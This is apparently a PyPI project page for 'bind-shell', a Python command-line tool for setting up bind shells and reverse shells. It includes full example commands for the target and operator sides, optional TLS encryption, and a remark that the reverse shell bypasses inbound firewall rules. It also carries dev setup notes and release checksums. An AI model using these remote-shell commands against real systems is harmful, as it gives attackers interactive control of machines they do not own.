Skip to main content

bind-shell PyPi PyPiStats

A CLI for creating and connecting to bind shells and reverse shells. Zero external dependencies — built entirely on Python stdlib.

Install

Use pipx to install globally in an isolated python environment.

pipx install bind-shell

Usage

usage: bind-shell [-h] {server,client,listen,connect} ...

positional arguments:
  {server,client,listen,connect}
    server              Bind shell: bind a port and execute commands from an incoming client
    client              Bind shell: connect to a server and send commands interactively
    listen              Reverse shell: bind a port and send commands to an incoming connector
    connect             Reverse shell: connect out to a listener and execute its commands

Pass --help to any positional argument for more detail.

Bind shell

The target runs server — it binds a port, logs the connection command, and waits. The operator runs client to connect in and issue commands.

# target
$ bind-shell server --shell bash
Bind-Shell WAN: bind-shell client 12.34.77.19 --port 4444 --password lvwsJLXjz0fhPtMVUQU6Ug
Bind-Shell LAN: bind-shell client 192.168.86.25 --port 4444 --password lvwsJLXjz0fhPtMVUQU6Ug
Bind-Shell Local: bind-shell client localhost --port 4444 --password lvwsJLXjz0fhPtMVUQU6Ug

# operator (use the connection string logged by the server)
$ bind-shell client 12.34.77.19 --port 4444 --password lvwsJLXjz0fhPtMVUQU6Ug
Connected: 12.34.77.19:4444
admin@server:~$

Reverse shell

The operator runs listen — it binds a port, logs the connection command, and waits. The target runs connect to call back out, bypassing inbound firewall rules.

# operator
$ bind-shell listen
Reverse-Shell WAN: bind-shell connect 12.34.77.19 --port 4444 --password nYA9pFabJ1ojR2ZfyQHabA
Reverse-Shell LAN: bind-shell connect 192.168.86.26 --port 4444 --password nYA9pFabJ1ojR2ZfyQHabA
Reverse-Shell Local: bind-shell connect localhost --port 4444 --password nYA9pFabJ1ojR2ZfyQHabA

# target (use the connection string logged by the listener)
$ bind-shell connect 12.34.77.19 --port 4444 --password nYA9pFabJ1ojR2ZfyQHabA --shell bash
Connected: 12.34.77.19:4444
user@target:~$

Type exit and/or Ctrl + C to close a session.

TLS encryption

Pass --tls to encrypt traffic. Like HTTPS, this uses one-way TLS: only the listening side (server or listen) presents a certificate; the connecting side (client or connect) accepts it without verification and does not need a certificate of its own.

Generate a self-signed certificate on the listening machine before starting:

$ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

Bind shell with TLS:

# target
$ bind-shell server --tls --cert cert.pem --key key.pem

# operator (connection string is logged by the server, including --tls)
$ bind-shell client 12.34.77.19 --port 4444 --password <password> --tls

Reverse shell with TLS:

# operator
$ bind-shell listen --tls --cert cert.pem --key key.pem

# target (connection string is logged by the listener, including --tls)
$ bind-shell connect 12.34.77.19 --port 4444 --password <password> --tls

Both sides must use --tls together — a TLS listener and a plain client will hang, since the listener waits for a TLS handshake that never arrives.

Dev Prerequisites

  • python >=3.10
  • pipx, an optional tool for prerequisite installs
  • poetry (install globally with pipx install poetry)
  • flake8 (install globally with pipx install flake8)
    • flake8-bugbear extension (install with pipx inject flake8 flake8-bugbear)
    • flake8-naming extension (install with pipx inject flake8 pep8-naming)
  • black (install globally with pipx install black)
  • pre-commit (install globally with pipx install pre-commit)
  • just, a Justfile command runner

Updating python version

  • Update python version in Dev Prerequisites above
  • Update [tool.poetry.dependencies] section of pyproject.toml
  • Update pyupgrade hook in .pre-commit-config.yaml
  • Update python version in .gitlab-ci.yml

Justfile Targets

  • install: installs poetry dependencies and pre-commit git hooks
  • update_boilerplate: fetches and applies updates from the boilerplate remote
  • test: runs pytest with test coverage report

Boilerplate

This project tracks the pyplate boilerplate via the boilerplate git remote. Run just update_boilerplate to pull latest changes. NOTE: keep the boilerplate remote history intact to successfully merge future updates.

Metadata

Release files for bind-shell 1.0.1

For a detailed explanation of source distributions (sdists) and built distributions (wheels), please see the package formats documentation.

Source distribution (sdist)

Source distribution for bind-shell 1.0.1
File Size Uploaded
bind_shell-1.0.1.tar.gz 7.2 kB Details

Built distribution (wheel)

Table of built distributions (wheels) for bind-shell 1.0.1
File Interpreter ABI Platform
bind_shell-1.0.1-py3-none-any.whl Python 3 none any Details

Total release size: 14.4 kB

Release files / bind_shell-1.0.1.tar.gz

Download URL bind_shell-1.0.1.tar.gz
Size 7.2 kB
Tags Source
SHA-256 checksum
How to use checksums
23987250c7fc5a1f27f6c8b0148aabcb5605bf540965344c9f6bf59d00860800
BLAKE2b-256 checksum
How to use checksums
388eb6e8764ef8a2622ea7283b786e289ef084900af9be30fb2c297454bfb0bf
Upload date
Uploaded using Trusted Publishing?
What is trusted publishing?
No
Uploaded via poetry/2.4.1 CPython/3.13.13 Linux/5.15.154+

Release files / bind_shell-1.0.1-py3-none-any.whl

Download URL bind_shell-1.0.1-py3-none-any.whl
Size 7.2 kB
Tags Python 3
SHA-256 checksum
How to use checksums
5d09ecb33fe800e6422491fd3ef502891b8ea91d337ef1732e9cdd6f9375a04e
BLAKE2b-256 checksum
How to use checksums
e2efff429fa63c210ce67ea12e8e47d941bf2528afaf852c8063d1bcb9bf3685
Upload date
Uploaded using Trusted Publishing?
What is trusted publishing?
No
Uploaded via poetry/2.4.1 CPython/3.13.13 Linux/5.15.154+
Anthropic, PBC Visionary sponsor Bloomberg Visionary sponsor Hudson River Trading Visionary sponsor Meta Visionary sponsor NVIDIA Visionary sponsor Microsoft Sustainability sponsor Depot Continuous Integration AWS Cloud computing and Security Sponsor Datadog Monitoring Fastly CDN Google Download Analytics Sentry Error logging StatusPage Status page